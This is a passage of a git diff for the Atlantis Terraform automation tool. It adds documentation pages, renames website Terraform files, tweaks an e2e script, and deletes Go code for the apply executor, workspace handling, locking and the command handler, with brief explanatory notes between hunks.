+(see [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#supporting-terraform-workspaces) for more details)
+or through the `-w` flag. For example:
+```
+atlantis plan -w staging
+atlantis apply -w staging
+```
+
+
+### .tfvars Files
+```
+.
+├── production.tfvars
+├── staging.tfvars
+└── main.tf
+```
+For Atlantis to be able to plan automatically with `.tfvars` files, you need to create
+an `atlantis.yaml` file to tell it to use `-var-file={YOUR_FILE}`.
+See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#using-tfvars-files) for more details.
+
+## Terraform Versions
+By default, Atlantis will use the `terraform` executable that is in its `PATH`.
+To use a specific version of Terraform:
+1. Install the desired version of Terraform into the `$PATH` where Atlantis is
+   running and name it `terraform{version}`, ex. `terraform0.8.8`.
+2. Create an `atlantis.yaml` file for your repo and set the `terraform_version` key.
+See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#terraform-versions) for more details.
+
+## Next Steps
+Check out our [full documentation](../docs/).
diff --git a/runatlantis.io/guide/test-drive.md b/runatlantis.io/guide/test-drive.md
new file mode 100644
index 0000000000..2b7b884b95
--- /dev/null
+++ b/runatlantis.io/guide/test-drive.md
@@ -0,0 +1,18 @@
+# Test Drive
+To try out running Atlantis yourself first, download the latest release for your architecture:
+[https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+
+Once you've extracted the archive, run:
+```bash
+./atlantis testdrive
+```
+
+This mode sets up Atlantis on a test repo so you can try it out. It will:
+- fork an example Terraform project into your GitHub account
+- install Terraform (if not already in your `PATH`)
+- install ngrok so we can expose Atlantis to GitHub
+- start Atlantis so you can execute commands on the pull request
+
+## Next Steps
+
+When you're ready to try out Atlantis on your own repos then read [Getting Started](getting-started.html).
diff --git a/website/terraform/main.tf b/runatlantis.io/terraform/main.tf
similarity index 100%
rename from website/terraform/main.tf
rename to runatlantis.io/terraform/main.tf
diff --git a/website/terraform/modules/cloudfront_distribution/main.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/main.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/main.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/main.tf
diff --git a/website/terraform/modules/cloudfront_distribution/outputs.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/outputs.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/outputs.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/outputs.tf
diff --git a/website/terraform/modules/cloudfront_distribution/variables.tf b/runatlantis.io/terraform/modules/cloudfront_distribution/variables.tf
similarity index 100%
rename from website/terraform/modules/cloudfront_distribution/variables.tf
rename to runatlantis.io/terraform/modules/cloudfront_distribution/variables.tf
diff --git a/website/terraform/s3_bucket_policy.json b/runatlantis.io/terraform/s3_bucket_policy.json
similarity index 100%
rename from website/terraform/s3_bucket_policy.json
rename to runatlantis.io/terraform/s3_bucket_policy.json
diff --git a/scripts/e2e.sh b/scripts/e2e.sh
index a1d3a44eea..02c6021658 100755
--- a/scripts/e2e.sh
+++ b/scripts/e2e.sh
@@ -8,7 +8,7 @@ ${CIRCLE_WORKING_DIRECTORY}/scripts/e2e-deps.sh
cd "${CIRCLE_WORKING_DIRECTORY}/e2e"
# start atlantis server in the background and wait for it to start
-./atlantis server --gh-user="$GITHUB_USERNAME" --gh-token="$GITHUB_PASSWORD" --data-dir="/tmp" --log-level="debug" --repo-whitelist="github.com/runatlantis/atlantis-tests" &> /tmp/atlantis-server.log &
+./atlantis server --gh-user="$GITHUB_USERNAME" --gh-token="$GITHUB_PASSWORD" --data-dir="/tmp" --log-level="debug" --repo-whitelist="github.com/runatlantis/atlantis-tests" --allow-repo-config &> /tmp/atlantis-server.log &
sleep 2
# start ngrok in the background and wait for it to start
diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
deleted file mode 100644
index 0ca0dc044f..0000000000
--- a/server/events/apply_executor.go
+++ /dev/null
@@ -1,150 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "os"
- "path/filepath"
-
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
- "github.com/runatlantis/atlantis/server/events/terraform"
- "github.com/runatlantis/atlantis/server/events/vcs"
- "github.com/runatlantis/atlantis/server/events/webhooks"
-)
-
-// ApplyExecutor handles executing terraform apply.
-type ApplyExecutor struct {
- VCSClient vcs.ClientProxy
- Terraform *terraform.DefaultClient
- RequireApproval bool
- Run *run.Run
- AtlantisWorkspace AtlantisWorkspace
- ProjectPreExecute *DefaultProjectPreExecutor
- Webhooks webhooks.Sender
-}
-
-// Execute executes apply for the ctx.
-func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse {
- if a.RequireApproval {
- approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull)
- if err != nil {
- return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")}
- }
- if !approved {
- return CommandResponse{Failure: "Pull request must be approved before running apply."}
- }
- ctx.Log.Info("confirmed pull request was approved")
- }
-
- repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
- if err != nil {
- return CommandResponse{Failure: "No workspace found. Did you run plan?"}
- }
- ctx.Log.Info("found workspace in %q", repoDir)
-
- // Plans are stored at project roots by their workspace names. We just
- // need to find them.
- var plans []models.Plan
- // If they didn't specify a directory, we apply all plans we can find for
- // this workspace.
- if ctx.Command.Dir == "" {
- err = filepath.Walk(repoDir, func(path string, info os.FileInfo, err error) error {
- if err != nil {
- return err
- }
- // Check if the plan is for the right workspace,
- if !info.IsDir() && info.Name() == ctx.Command.Workspace+".tfplan" {
- rel, _ := filepath.Rel(repoDir, filepath.Dir(path))
- plans = append(plans, models.Plan{
- Project: models.NewProject(ctx.BaseRepo.FullName, rel),
- LocalPath: path,
- })
- }
- return nil
- })
- if err != nil {
- return CommandResponse{Error: errors.Wrap(err, "finding plans")}
- }
- } else {
- // If they did specify a dir, we apply just the plan in that directory
- // for this workspace.
- planPath := filepath.Join(repoDir, ctx.Command.Dir, ctx.Command.Workspace+".tfplan")
- stat, err := os.Stat(planPath)
- if err != nil || stat.IsDir() {
- return CommandResponse{Error: fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.Command.Dir, ctx.Command.Workspace)}
- }
- relProjectPath, _ := filepath.Rel(repoDir, filepath.Dir(planPath))
- plans = append(plans, models.Plan{
- Project: models.NewProject(ctx.BaseRepo.FullName, relProjectPath),
- LocalPath: planPath,
- })
- }
- if len(plans) == 0 {
- return CommandResponse{Failure: "No plans found for that workspace."}
- }
- var paths []string
- for _, p := range plans {
- paths = append(paths, p.LocalPath)
- }
- ctx.Log.Info("found %d plan(s) in our workspace: %v", len(plans), paths)
-
- var results []ProjectResult
- for _, plan := range plans {
- ctx.Log.Info("running apply for project at path %q", plan.Project.Path)
- result := a.apply(ctx, repoDir, plan)
- result.Path = plan.LocalPath
- results = append(results, result)
- }
- return CommandResponse{ProjectResults: results}
-}
-
-func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.Plan) ProjectResult {
- preExecute := a.ProjectPreExecute.Execute(ctx, repoDir, plan.Project)
- if preExecute.ProjectResult != (ProjectResult{}) {
- return preExecute.ProjectResult
- }
- config := preExecute.ProjectConfig
- terraformVersion := preExecute.TerraformVersion
-
- applyExtraArgs := config.GetExtraArguments(ctx.Command.Name.String())
- absolutePath := filepath.Join(repoDir, plan.Project.Path)
- workspace := ctx.Command.Workspace
- tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, applyExtraArgs...), ctx.Command.Flags...), plan.LocalPath)
- output, err := a.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, tfApplyCmd, terraformVersion, workspace)
-
- a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
- Workspace: workspace,
- User: ctx.User,
- Repo: ctx.BaseRepo,
- Pull: ctx.Pull,
- Success: err == nil,
- })
-
- if err != nil {
- return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)}
- }
- ctx.Log.Info("apply succeeded")
-
- if len(config.PostApply) > 0 {
- _, err := a.Run.Execute(ctx.Log, config.PostApply, absolutePath, workspace, terraformVersion, "post_apply")
- if err != nil {
- return ProjectResult{Error: errors.Wrap(err, "running post apply commands")}
- }
- }
-
- return ProjectResult{ApplySuccess: output}
-}
diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go
deleted file mode 100644
index a57aee053f..0000000000
--- a/server/events/atlantis_workspace.go
+++ /dev/null
@@ -1,106 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "os"
- "os/exec"
- "path/filepath"
- "strconv"
-
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/logging"
-)
-
-const workspacePrefix = "repos"
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_atlantis_workspace.go AtlantisWorkspace
-
-// AtlantisWorkspace handles the workspace on disk for running commands.
-type AtlantisWorkspace interface {
- // Clone git clones headRepo, checks out the branch and then returns the
- // absolute path to the root of the cloned repo.
- Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error)
- // GetWorkspace returns the path to the workspace for this repo and pull.
- GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error)
- // Delete deletes the workspace for this repo and pull.
- Delete(r models.Repo, p models.PullRequest) error
-}
-
-// FileWorkspace implements AtlantisWorkspace with the file system.
-type FileWorkspace struct {
- DataDir string
-}
-
-// Clone git clones headRepo, checks out the branch and then returns the absolute
-// path to the root of the cloned repo.
-func (w *FileWorkspace) Clone(
- log *logging.SimpleLogger,
- baseRepo models.Repo,
- headRepo models.Repo,
- p models.PullRequest,
- workspace string) (string, error) {
- cloneDir := w.cloneDir(baseRepo, p, workspace)
-
- // This is safe to do because we lock runs on repo/pull/workspace so no one else
- // is using this workspace.
- log.Info("cleaning clone directory %q", cloneDir)
- if err := os.RemoveAll(cloneDir); err != nil {
- return "", errors.Wrap(err, "deleting old workspace")
- }
-
- // Create the directory and parents if necessary.
- log.Info("creating dir %q", cloneDir)
- if err := os.MkdirAll(cloneDir, 0700); err != nil {
- return "", errors.Wrap(err, "creating new workspace")
- }
-
- log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir)
- cloneCmd := exec.Command("git", "clone", headRepo.CloneURL, cloneDir) // #nosec
- if output, err := cloneCmd.CombinedOutput(); err != nil {
- return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output))
- }
-
- // Check out the branch for this PR.
- log.Info("checking out branch %q", p.Branch)
- checkoutCmd := exec.Command("git", "checkout", p.Branch) // #nosec
- checkoutCmd.Dir = cloneDir
- if err := checkoutCmd.Run(); err != nil {
- return "", errors.Wrapf(err, "checking out branch %s", p.Branch)
- }
- return cloneDir, nil
-}
-
-// GetWorkspace returns the path to the workspace for this repo and pull.
-func (w *FileWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) {
- repoDir := w.cloneDir(r, p, workspace)
- if _, err := os.Stat(repoDir); err != nil {
- return "", errors.Wrap(err, "checking if workspace exists")
- }
- return repoDir, nil
-}
-
-// Delete deletes the workspace for this repo and pull.
-func (w *FileWorkspace) Delete(r models.Repo, p models.PullRequest) error {
- return os.RemoveAll(w.repoPullDir(r, p))
-}
-
-func (w *FileWorkspace) repoPullDir(r models.Repo, p models.PullRequest) string {
- return filepath.Join(w.DataDir, workspacePrefix, r.FullName, strconv.Itoa(p.Num))
-}
-
-func (w *FileWorkspace) cloneDir(r models.Repo, p models.PullRequest, workspace string) string {
- return filepath.Join(w.repoPullDir(r, p), workspace)
-}
diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go
deleted file mode 100644
index 594ea08ab6..0000000000
--- a/server/events/atlantis_workspace_locker.go
+++ /dev/null
@@ -1,74 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "sync"
-)
-
-//go:generate pegomock generate --use-experimental-model-gen --package mocks -o mocks/mock_atlantis_workspace_locker.go AtlantisWorkspaceLocker
-
-// AtlantisWorkspaceLocker is used to prevent multiple commands from executing
-// at the same time for a single repo, pull, and workspace. We need to prevent
-// this from happening because a specific repo/pull/workspace has a single workspace
-// on disk and we haven't written Atlantis (yet) to handle concurrent execution
-// within this workspace.
-// This locker is called AtlantisWorkspaceLocker to differentiate it from the
-// Terraform concept of workspaces, not directories on disk managed by Atlantis.
-type AtlantisWorkspaceLocker interface {
- // TryLock tries to acquire a lock for this repo, workspace and pull.
- TryLock(repoFullName string, workspace string, pullNum int) bool
- // Unlock deletes the lock for this repo, workspace and pull. If there was no
- // lock it will do nothing.
- Unlock(repoFullName, workspace string, pullNum int)
-}
-
-// DefaultAtlantisWorkspaceLocker implements AtlantisWorkspaceLocker.
-type DefaultAtlantisWorkspaceLocker struct {
- mutex sync.Mutex
- locks map[string]interface{}
-}
-
-// NewDefaultAtlantisWorkspaceLocker is a constructor.
-func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker {
- return &DefaultAtlantisWorkspaceLocker{
- locks: make(map[string]interface{}),
- }
-}
-
-// TryLock returns true if a lock is acquired for this repo, pull and workspace and
-// false otherwise.
-func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
- d.mutex.Lock()
- defer d.mutex.Unlock()
-
- key := d.key(repoFullName, workspace, pullNum)
- if _, ok := d.locks[key]; !ok {
- d.locks[key] = true
- return true
- }
- return false
-}
-
-// Unlock unlocks the repo, pull and workspace.
-func (d *DefaultAtlantisWorkspaceLocker) Unlock(repoFullName, workspace string, pullNum int) {
- d.mutex.Lock()
- defer d.mutex.Unlock()
- delete(d.locks, d.key(repoFullName, workspace, pullNum))
-}
-
-func (d *DefaultAtlantisWorkspaceLocker) key(repo string, workspace string, pull int) string {
- return fmt.Sprintf("%s/%s/%d", repo, workspace, pull)
-}
diff --git a/server/events/atlantis_workspace_locker_test.go b/server/events/atlantis_workspace_locker_test.go
deleted file mode 100644
index 389f1e7df6..0000000000
--- a/server/events/atlantis_workspace_locker_test.go
+++ /dev/null
@@ -1,116 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "testing"
-
- "github.com/runatlantis/atlantis/server/events"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var repo = "repo/owner"
-var workspace = "default"
-
-func TestTryLock(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("the first lock should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
-
- t.Log("now another lock for the same repo, workspace, and pull should fail")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
-}
-
-func TestTryLockDifferentWorkspaces(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("a lock for the same repo and pull but different workspace should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
-
- t.Log("and both should now be locked")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
- Equals(t, false, locker.TryLock(repo, "new-workspace", 1))
-}
-
-func TestTryLockDifferentRepo(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("a lock for a different repo but the same workspace and pull should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- newRepo := "owner/newrepo"
- Equals(t, true, locker.TryLock(newRepo, workspace, 1))
-
- t.Log("and both should now be locked")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
- Equals(t, false, locker.TryLock(newRepo, workspace, 1))
-}
-
-func TestTryLockDifferentPulls(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("a lock for a different pull but the same repo and workspace should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- newPull := 2
- Equals(t, true, locker.TryLock(repo, workspace, newPull))
-
- t.Log("and both should now be locked")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
- Equals(t, false, locker.TryLock(repo, workspace, newPull))
-}
-
-func TestUnlock(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("unlocking should work")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- locker.Unlock(repo, workspace, 1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
-}
-
-func TestUnlockDifferentWorkspaces(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
- t.Log("unlocking should work for different workspaces")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
- locker.Unlock(repo, workspace, 1)
- locker.Unlock(repo, "new-workspace", 1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
-}
-
-func TestUnlockDifferentRepos(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
- t.Log("unlocking should work for different repos")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- newRepo := "owner/newrepo"
- Equals(t, true, locker.TryLock(newRepo, workspace, 1))
- locker.Unlock(repo, workspace, 1)
- locker.Unlock(newRepo, workspace, 1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(newRepo, workspace, 1))
-}
-
-func TestUnlockDifferentPulls(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
- t.Log("unlocking should work for different 1s")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- new1 := 2
- Equals(t, true, locker.TryLock(repo, workspace, new1))
- locker.Unlock(repo, workspace, 1)
- locker.Unlock(repo, workspace, new1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, workspace, new1))
-}
diff --git a/server/events/command_context.go b/server/events/command_context.go
index 35a2a1b141..49b0f07268 100644
--- a/server/events/command_context.go
+++ b/server/events/command_context.go
@@ -18,8 +18,8 @@ import (
"github.com/runatlantis/atlantis/server/logging"
)
-// CommandContext represents the context of a command that came from a comment
-// on a pull request.
+// CommandContext represents the context of a command that should be executed
+// for a pull request.
type CommandContext struct {
// BaseRepo is the repository that the pull request will be merged into.
BaseRepo models.Repo
@@ -30,7 +30,6 @@ type CommandContext struct {
HeadRepo models.Repo
Pull models.PullRequest
// User is the user that triggered this command.
- User models.User
- Command *Command
- Log *logging.SimpleLogger
+ User models.User
+ Log *logging.SimpleLogger
}
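
With Command removed from the struct, CommandContext now carries only pull request and user data; the parsed command is passed alongside it. A hypothetical call site under the new shape (field values illustrative):

    ctx := &events.CommandContext{
        BaseRepo: baseRepo,
        HeadRepo: headRepo,
        Pull:     pull,
        User:     user,
        Log:      log,
    }
    // The command itself travels as a separate argument, e.g.:
    // c.updatePull(ctx, cmd, result)
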
diff --git a/server/events/command_handler.go b/server/events/command_handler.go
deleted file mode 100644
index 52dd2090bd..0000000000
--- a/server/events/command_handler.go
+++ /dev/null
@@ -1,213 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
-
- "github.com/google/go-github/github"
- "github.com/lkysow/go-gitlab"
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/vcs"
- "github.com/runatlantis/atlantis/server/logging"
- "github.com/runatlantis/atlantis/server/recovery"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_command_runner.go CommandRunner
-
-// CommandRunner is the first step after a command request has been parsed.
-type CommandRunner interface {
- // ExecuteCommand is the first step after a command request has been parsed.
- // It handles gathering additional information needed to execute the command
- // and then calling the appropriate services to finish executing the command.
- ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command)
-}
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter
-
-// GithubPullGetter makes API calls to get pull requests.
-type GithubPullGetter interface {
- // GetPullRequest gets the pull request with id pullNum for the repo.
- GetPullRequest(repo models.Repo, pullNum int) (*github.PullRequest, error)
-}
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_merge_request_getter.go GitlabMergeRequestGetter
-
-// GitlabMergeRequestGetter makes API calls to get merge requests.
-type GitlabMergeRequestGetter interface {
- // GetMergeRequest gets the merge request with the id pullNum for the repo.
- GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error)
-}
-
-// CommandHandler is the first step when processing a comment command.
-type CommandHandler struct {
- PlanExecutor Executor
- ApplyExecutor Executor
- LockURLGenerator LockURLGenerator
- VCSClient vcs.ClientProxy
- GithubPullGetter GithubPullGetter
- GitlabMergeRequestGetter GitlabMergeRequestGetter
- CommitStatusUpdater CommitStatusUpdater
- EventParser EventParsing
- AtlantisWorkspaceLocker AtlantisWorkspaceLocker
- MarkdownRenderer *MarkdownRenderer
- Logger logging.SimpleLogging
- // AllowForkPRs controls whether we operate on pull requests from forks.
- AllowForkPRs bool
- // AllowForkPRsFlag is the name of the flag that controls fork PRs. We use
- // this in our error message back to the user on a forked PR so they know
- // how to enable this functionality.
- AllowForkPRsFlag string
-}
-
-// ExecuteCommand executes the command.
-// If the repo is from GitHub, we don't use headRepo and instead make an API call
-// to get the headRepo. This is because the caller is unable to pass in a
-// headRepo since there's not enough data available on the initial webhook
-// payload.
-func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) {
- log := c.buildLogger(baseRepo.FullName, pullNum)
-
- var err error
- var pull models.PullRequest
- switch baseRepo.VCSHost.Type {
- case models.Github:
- pull, headRepo, err = c.getGithubData(baseRepo, pullNum)
- case models.Gitlab:
- pull, err = c.getGitlabData(baseRepo, pullNum)
- default:
- err = errors.New("Unknown VCS type, this is a bug!")
- }
- if err != nil {
- log.Err(err.Error())
- return
- }
- ctx := &CommandContext{
- User: user,
- Log: log,
- Pull: pull,
- HeadRepo: headRepo,
- Command: cmd,
- BaseRepo: baseRepo,
- }
- c.run(ctx)
-}
-
-func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
- if c.GithubPullGetter == nil {
- return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub")
- }
- ghPull, err := c.GithubPullGetter.GetPullRequest(baseRepo, pullNum)
- if err != nil {
- return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub")
- }
- pull, repo, err := c.EventParser.ParseGithubPull(ghPull)
- if err != nil {
- return pull, repo, errors.Wrap(err, "extracting required fields from comment data")
- }
- return pull, repo, nil
-}
-
-func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) {
- if c.GitlabMergeRequestGetter == nil {
- return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab")
- }
- mr, err := c.GitlabMergeRequestGetter.GetMergeRequest(baseRepo.FullName, pullNum)
- if err != nil {
- return models.PullRequest{}, errors.Wrap(err, "making merge request API call to GitLab")
- }
- pull := c.EventParser.ParseGitlabMergeRequest(mr, baseRepo)
- return pull, nil
-}
-
-func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger {
- src := fmt.Sprintf("%s#%d", repoFullName, pullNum)
- return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel())
-}
-
-// SetLockURL sets a function that's used to return the URL for a lock.
-func (c *CommandHandler) SetLockURL(f func(id string) (url string)) {
- c.LockURLGenerator.SetLockURL(f)
-}
-
-func (c *CommandHandler) run(ctx *CommandContext) {
- log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num)
- ctx.Log = log
- defer c.logPanics(ctx)
-
- if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner {
- ctx.Log.Info("command was run on a fork pull request which is disallowed")
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck
- return
- }
-
- if ctx.Pull.State != models.Open {
- ctx.Log.Info("command was run on closed pull request")
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck
- return
- }
-
- if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil {
- ctx.Log.Warn("unable to update commit status: %s", err)
- }
- if !c.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) {
- errMsg := fmt.Sprintf(
- "The %s workspace is currently locked by another"+
- " command that is running for this pull request."+
- " Wait until the previous command is complete and try again.",
- ctx.Command.Workspace)
- ctx.Log.Warn(errMsg)
- c.updatePull(ctx, CommandResponse{Failure: errMsg})
- return
- }
- defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num)
-
- var cr CommandResponse
- switch ctx.Command.Name {
- case Plan:
- cr = c.PlanExecutor.Execute(ctx)
- case Apply:
- cr = c.ApplyExecutor.Execute(ctx)
- default:
- ctx.Log.Err("failed to determine desired command, neither plan nor apply")
- }
- c.updatePull(ctx, cr)
-}
-
-func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) {
- // Log if we got any errors or failures.
- if res.Error != nil {
- ctx.Log.Err(res.Error.Error())
- } else if res.Failure != "" {
- ctx.Log.Warn(res.Failure)
- }
-
- // Update the pull request's status icon and comment back.
- if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil {
- ctx.Log.Warn("unable to update commit status: %s", err)
- }
- comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose)
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck
-}
-
-// logPanics logs and creates a comment on the pull request for panics.
-func (c *CommandHandler) logPanics(ctx *CommandContext) {
- if err := recover(); err != nil {
- stack := recovery.Stack(3)
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck
- fmt.Sprintf("**Error: goroutine panic. This is a bug.**\n```\n%s\n%s```", err, stack))
- ctx.Log.Err("PANIC: %s\n%s", err, stack)
- }
-}
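
The removed handler exposed a single entry point for every command; a call looked like the sketch below. Its replacement, DefaultCommandRunner (added later in this diff), splits this into separate comment-command and autoplan paths.

    handler.ExecuteCommand(baseRepo, headRepo, user, pullNum, cmd)
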
diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go
deleted file mode 100644
index 598ed6e234..0000000000
--- a/server/events/command_handler_test.go
+++ /dev/null
@@ -1,250 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
